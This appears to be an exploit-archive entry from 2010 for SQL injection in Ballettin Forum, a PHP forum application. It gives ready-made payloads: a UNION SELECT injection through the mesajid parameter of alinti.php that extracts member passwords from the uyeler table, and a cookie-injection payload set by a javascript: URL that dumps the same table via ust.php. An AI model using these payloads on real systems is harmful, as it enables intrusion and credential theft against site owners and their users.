Ballettin Forum SQL Injection Vulnerability

2010-07-25T00:00:00
ID 1337DAY-ID-13471
Type zdt
Reporter 3v0
Modified 2010-07-25T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================
Ballettin Forum SQL Injection Vulnerability
===========================================


====================================================================
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
# Date: 25/07/2010
# Author: 3v0 aka evolution <evolution ^ darkedition.com>
# Software Link: http://www.ballettin.com
# Tested on: Windows Xp Pack 3
====================================================================
#1 - Vulnerable File
------------------------------------------------------
[+] File: http://www.site.com/alinti.php?mesajid=[SQL]
[+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
 
#2 - Insecure Cookie
------------------------------------------------------
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
After go to http://www.site.com/ust.php
====================================================================



#  0day.today [2018-02-19]  #